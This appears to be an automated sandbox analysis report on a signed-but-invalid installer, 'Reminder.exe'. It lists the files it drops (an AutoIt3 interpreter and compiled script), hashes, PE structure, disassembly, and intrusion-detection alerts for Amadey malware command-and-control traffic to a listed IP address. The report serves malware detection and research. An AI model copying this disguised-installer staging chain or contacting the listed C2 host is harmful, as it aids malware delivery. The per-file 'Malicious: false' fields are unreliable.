SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp

Download File

Process:	C:\Users\user\Desktop\Reminder.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3366912
Entropy (8bit):	6.530549902297875
Encrypted:	false
SSDEEP:	98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:	45CC5C19328748F850CC9FE5E65AC9F3
SHA1:	0684E3A5003844B4AAAC819C969527FAB0C40F44
SHA-256:	2ADA8B93B64BD935D481E40155037A9C8314A21E2C81B978AE1CE8BE06DD5A31
SHA-512:	B1DEF09206FF2D6285830BDC90D26A08A1FAC31DE4B30CB39E438E7B4926963BE79E033FB5C6BB69D7CE7D2E9756A2764CBE703AABE6743606D079281EF5E5FC
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\friend\Updater.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	943784
Entropy (8bit):	6.621472142472864
Encrypted:	false
SSDEEP:	24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
MD5:	3F58A517F1F4796225137E7659AD2ADB
SHA1:	E264BA0E9987B0AD0812E5DD4DD3075531CFE269
SHA-256:	1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
SHA-512:	ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..\|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................\|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\friend\is-25M5S.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
File Type:	data
Category:	dropped
Size (bytes):	64302
Entropy (8bit):	7.99747122128908
Encrypted:	true
SSDEEP:	1536:YJTbCqFC3mhFOwLah/4qYkDwlbstmcn/t/nZNYlVV:YtblFbGwLa2kElbTSF/nD8VV
MD5:	EDC46875D90FA9CFE80F486AD11BC7E0
SHA1:	ABFF74B6AC6C5F40DCB4265D6CB513BEAFF1D811
SHA-256:	87C67ABEC0E2596DF376B904B05FF0D6A2B08A22D63B5B3C890AF579C03268D5
SHA-512:	70B2012C6EE3AA2C34154A041B8656F7FC3A24B51A86ADF32DA3CB31D9D7F5F13951CFE7EBE5F94386277CB55ECE8712FCF1B7F680890A3BC1EEDE5DE32AB50F
Malicious:	false
Preview:	.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....k:\.....K.).9.....w.ySQ.....&...FO.O.....zo..eT..b..B..D...\|......f....f.jR&.?-."..M.a.#a.@&:y.V(..v..........y..............N&..'.4.N&..'.4.kC.R......%x....}...q..U-...(....%....V..?p.h......<.Y....w^.........I..E..qX...+...,.F.T.\|B4.-T....4..^....a,....m...]...R..'..Jp..m....).Px)..=..6.Q...ol..=......y.jp....~..U!..DO0.N&....0.N&...4.m......P..x.5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!.ne.."Yj...=c.#..t.E....Yt].5M".....z.8.\y..}=.~./.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o...X).H.>. .)z.....)-^.....9.....M...#..8..x.....9.i..z.=#R.=i>0..X... M..J.......u.##....Ez....U...Z8..@u.Dj....Yu?.px........(.1.0.S..@......'E.........5.8..B.;..E..q.S...f,..Z?..O..\...#B;<qr6..pw.[D.].9.G%_...........e}! .mj..?....u..6....i]&1...e..-7(VQBo....Y..6..w.'..A..=f6w,+.?..F.tA(./...h..X.7

C:\Users\user\AppData\Local\friend\is-3HDT1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
File Type:	data
Category:	dropped
Size (bytes):	737441
Entropy (8bit):	6.460518108663701
Encrypted:	false
SSDEEP:	12288:TPQQ6hn3hZJdZGbhE8bhnuX7Uj8y++14GbAl/mI61KrpMFu:zQNxnS7GBrFx+89MFu
MD5:	0EE424DA61DF8BF82FED4D5EE6F191F8
SHA1:	919D40CCDF98A76991A3DB53A43A85F3939645AC
SHA-256:	A9C83D4555F1D6B3E59EFC11EA7D6811BFC1A4324736378B166EC13F585FF5FF
SHA-512:	4CCCF9F4F153F3E1B83ADC31E2A00057D681BCB7D321AF56B24E5299DBCA89AE311F3BBAFEB7B48268149E89A94C05F9BC61B02B860D210329F342A1286179F7
Malicious:	false
Preview:	C:j...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................C:j.....................................

C:\Users\user\AppData\Local\friend\is-SBSAG.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	943784
Entropy (8bit):	6.621472142472864
Encrypted:	false
SSDEEP:	24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
MD5:	3F58A517F1F4796225137E7659AD2ADB
SHA1:	E264BA0E9987B0AD0812E5DD4DD3075531CFE269
SHA-256:	1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
SHA-512:	ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..\|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................\|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\friend\yeorling.csv (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
File Type:	data
Category:	dropped
Size (bytes):	64302
Entropy (8bit):	7.99747122128908
Encrypted:	true
SSDEEP:	1536:YJTbCqFC3mhFOwLah/4qYkDwlbstmcn/t/nZNYlVV:YtblFbGwLa2kElbTSF/nD8VV
MD5:	EDC46875D90FA9CFE80F486AD11BC7E0
SHA1:	ABFF74B6AC6C5F40DCB4265D6CB513BEAFF1D811
SHA-256:	87C67ABEC0E2596DF376B904B05FF0D6A2B08A22D63B5B3C890AF579C03268D5
SHA-512:	70B2012C6EE3AA2C34154A041B8656F7FC3A24B51A86ADF32DA3CB31D9D7F5F13951CFE7EBE5F94386277CB55ECE8712FCF1B7F680890A3BC1EEDE5DE32AB50F
Malicious:	false
Preview:	.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....k:\.....K.).9.....w.ySQ.....&...FO.O.....zo..eT..b..B..D...\|......f....f.jR&.?-."..M.a.#a.@&:y.V(..v..........y..............N&..'.4.N&..'.4.kC.R......%x....}...q..U-...(....%....V..?p.h......<.Y....w^.........I..E..qX...+...,.F.T.\|B4.-T....4..^....a,....m...]...R..'..Jp..m....).Px)..=..6.Q...ol..=......y.jp....~..U!..DO0.N&....0.N&...4.m......P..x.5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!.ne.."Yj...=c.#..t.E....Yt].5M".....z.8.\y..}=.~./.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o...X).H.>. .)z.....)-^.....9.....M...#..8..x.....9.i..z.=#R.=i>0..X... M..J.......u.##....Ez....U...Z8..@u.Dj....Yu?.px........(.1.0.S..@......'E.........5.8..B.;..E..q.S...f,..Z?..O..\...#B;<qr6..pw.[D.].9.G%_...........e}! .mj..?....u..6....i]&1...e..-7(VQBo....Y..6..w.'..A..=f6w,+.?..F.tA(./...h..X.7

C:\Users\user\AppData\Local\friend\yeorling.vstm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
File Type:	data
Category:	dropped
Size (bytes):	737441
Entropy (8bit):	6.460518108663701
Encrypted:	false
SSDEEP:	12288:TPQQ6hn3hZJdZGbhE8bhnuX7Uj8y++14GbAl/mI61KrpMFu:zQNxnS7GBrFx+89MFu
MD5:	0EE424DA61DF8BF82FED4D5EE6F191F8
SHA1:	919D40CCDF98A76991A3DB53A43A85F3939645AC
SHA-256:	A9C83D4555F1D6B3E59EFC11EA7D6811BFC1A4324736378B166EC13F585FF5FF
SHA-512:	4CCCF9F4F153F3E1B83ADC31E2A00057D681BCB7D321AF56B24E5299DBCA89AE311F3BBAFEB7B48268149E89A94C05F9BC61B02B860D210329F342A1286179F7
Malicious:	false
Preview:	C:j...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................C:j.....................................

C:\edgheaa\AutoIt3.exe

Download File

Process:	C:\Users\user\AppData\Local\friend\Updater.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	943784
Entropy (8bit):	6.621472142472864
Encrypted:	false
SSDEEP:	24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
MD5:	3F58A517F1F4796225137E7659AD2ADB
SHA1:	E264BA0E9987B0AD0812E5DD4DD3075531CFE269
SHA-256:	1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
SHA-512:	ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..\|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................\|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................

C:\edgheaa\fkccfcd.a3x

Download File

Process:	C:\Users\user\AppData\Local\friend\Updater.exe
File Type:	data
Category:	dropped
Size (bytes):	737441
Entropy (8bit):	6.460518108663701
Encrypted:	false
SSDEEP:	12288:TPQQ6hn3hZJdZGbhE8bhnuX7Uj8y++14GbAl/mI61KrpMFu:zQNxnS7GBrFx+89MFu
MD5:	0EE424DA61DF8BF82FED4D5EE6F191F8
SHA1:	919D40CCDF98A76991A3DB53A43A85F3939645AC
SHA-256:	A9C83D4555F1D6B3E59EFC11EA7D6811BFC1A4324736378B166EC13F585FF5FF
SHA-512:	4CCCF9F4F153F3E1B83ADC31E2A00057D681BCB7D321AF56B24E5299DBCA89AE311F3BBAFEB7B48268149E89A94C05F9BC61B02B860D210329F342A1286179F7
Malicious:	false
Preview:	C:j...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................C:j.....................................

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	478
Entropy (8bit):	4.9404427828211634
Encrypted:	false
SSDEEP:	12:PKMRJpTeTeTeTeT0s+sEAFSkIrxMVlmJHaVzvv:/2fAokItULVDv
MD5:	1D785D889CA617298A68D26DFEF974C4
SHA1:	1CC36474033E2767B059019B12782CE558F1EA34
SHA-256:	FE52FE8317F9F07F4AB830F6E3B1F1013BE4AA2A82DD5C86AA805648FC053230
SHA-512:	EF34C2479BE5BA45B41584887354DE53EA15EC53EA74D57042FF57EB8A609B93DAC9A55297300C29320CE14966FB7704C9952BDC7C6E2DDD0DCA929884091CF3
Malicious:	false
Preview:	..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.113957348907258
TrID:	Win32 Executable (generic) a (10002005/4) 98.04% Inno Setup installer (109748/4) 1.08% InstallShield setup (43055/19) 0.42% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	Reminder.exe
File size:	5'563'800 bytes
MD5:	df45696ef1463f335a6cc5dc72c607d0
SHA1:	699eaf22d81b5dd5a7177641d9a784db7dd80eb9
SHA256:	2e29ddac4856b370c1c8e7ebc3dd90afeafddaf932b17fcf91f1150d52ee28d7
SHA512:	9d1d6de6e66ed818f98d9f33a73679745322b0b7160ef121a5e044d47f65f19d429cfde670225828ceb242ff255b6b98e7b970df163db7903690984487d058d2
SSDEEP:	49152:JwREDDMzUUs+Yj5/UF98c2OTe/rdHeMxWrP+beY7UY71mTgZu3hkatehPi9iH4fV:JwREQUUhU5/UTD2OTadMwZg1kasJioHI
TLSH:	0346B0AD7FE6C115C01C057A0AF1DE70C8E22E21DCD1A59DA2E4BD3966637CE452E22F
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x4a83bc
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	40ab50289f7ef5fae60801f88d4541fc

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	14/04/2023 01:00:00 14/04/2025 00:59:59
Subject Chain	CN=Greatis Software LLC, O=Greatis Software LLC, S=New York, C=US, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Wyoming, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=2022-001091494
Version:	3
Thumbprint MD5:	CC54E1F0D3FF37BE8B3B36C619DD2EB1
Thumbprint SHA-1:	7C7C974D4051160F41AB50E9A0F30943466F97EA
Thumbprint SHA-256:	8C4C4BD8924C54CD99EB29F77505E7921F4A752E565570B433FF83C75F8A5909
Serial:	0DA3BB19EB0FCFEF5DF67F2C9086913F

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004A2EBCh
call 00007FDCC561FF05h
xor eax, eax
push ebp
push 004A8AC1h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004A8A7Bh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004B0634h]
call 00007FDCC56B188Bh
call 00007FDCC56B13DEh
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007FDCC56AC0B8h
mov edx, dword ptr [ebp-14h]
mov eax, 004B41F4h
call 00007FDCC5619FB3h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004B41F4h]
mov dl, 01h
mov eax, dword ptr [0049CD14h]
call 00007FDCC56AD3E3h
mov dword ptr [004B41F8h], eax
xor edx, edx
push ebp
push 004A8A27h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007FDCC56B1913h
mov dword ptr [004B4200h], eax
mov eax, dword ptr [004B4200h]
cmp dword ptr [eax+0Ch], 01h
jne 00007FDCC56B85FAh
mov eax, dword ptr [004B4200h]
mov edx, 00000028h
call 00007FDCC56ADCD8h
mov edx, dword ptr [004B4200h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xb7000	0x71	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb5000	0xfec	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcb000	0x11000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x54bc00	0x2998
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0x10fa8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xb9000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb52d4	0x25c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xb6000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa568c	0xa5800	b889d302f6fc48a904de33d8d947ae80	False	0.3620185045317221	data	6.377190161826806	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xa7000	0x1b64	0x1c00	588dd0a8ab499300d3701cbd11b017d9	False	0.548828125	data	6.109264411030635	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa9000	0x3838	0x3a00	5c0c76e77aef52ebc6702430837ccb6e	False	0.35338092672413796	data	4.95916338709992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xad000	0x7258	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb5000	0xfec	0x1000	627340dff539ef99048969aa4824fb2d	False	0.380615234375	data	5.020404933181373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xb6000	0x1a4	0x200	fd11c1109737963cc6cb7258063abfd6	False	0.34765625	data	2.729290535217263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xb7000	0x71	0x200	7de8ca0c7a61668a728fd3a88dc0942d	False	0.1796875	data	1.305578535725827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xb8000	0x18	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xb9000	0x5d	0x200	d84006640084dc9f74a07c2ff9c7d656	False	0.189453125	data	1.3892750148744617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0x10fa8	0x11000	a85fda2741bd9417695daa5fc5a9d7a5	False	0.5789579503676471	data	6.709466460182023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xcb000	0x11000	0x11000	931c5acec7552f54b7edf93eb214342f	False	0.18794519761029413	data	3.7219664045616785	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xcb678	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0xcc0e0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0xcc748	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0xcca30	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
RT_ICON	0xccb58	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0xce180	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0xcf028	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0xcf8d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0xcfe38	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0xd1120	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0xd5348	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0xd78f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0xd8998	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_STRING	0xd8e00	0x3f8	data			0.3198818897637795
RT_STRING	0xd91f8	0x2dc	data			0.36475409836065575
RT_STRING	0xd94d4	0x430	data			0.40578358208955223
RT_STRING	0xd9904	0x44c	data			0.38636363636363635
RT_STRING	0xd9d50	0x2d4	data			0.39226519337016574
RT_STRING	0xda024	0xb8	data			0.6467391304347826
RT_STRING	0xda0dc	0x9c	data			0.6410256410256411
RT_STRING	0xda178	0x374	data			0.4230769230769231
RT_STRING	0xda4ec	0x398	data			0.3358695652173913
RT_STRING	0xda884	0x368	data			0.3795871559633027
RT_STRING	0xdabec	0x2a4	data			0.4275147928994083
RT_RCDATA	0xdae90	0x10	data			1.5
RT_RCDATA	0xdaea0	0x310	data			0.6173469387755102
RT_RCDATA	0xdb1b0	0x2c	data			1.1818181818181819
RT_GROUP_ICON	0xdb1dc	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0xdb298	0x584	data	English	United States	0.29107648725212465
RT_MANIFEST	0xdb81c	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

Imports

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

Exports

Name	Ordinal	Address
__dbk_fcall_wrapper	2	0x40fc10
dbkFCallWrapperAddr	1	0x4b063c

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-27T17:11:04.069020+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	57723	152.89.198.124	80	TCP
2024-10-27T17:11:06.682086+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	57736	152.89.198.124	80	TCP
2024-10-27T17:11:09.075978+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	57751	152.89.198.124	80	TCP
2024-10-27T17:11:14.044735+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	57783	152.89.198.124	80	TCP
2024-10-27T17:11:18.955990+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	57808	152.89.198.124	80	TCP
2024-10-27T17:11:23.888441+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	57835	152.89.198.124	80	TCP
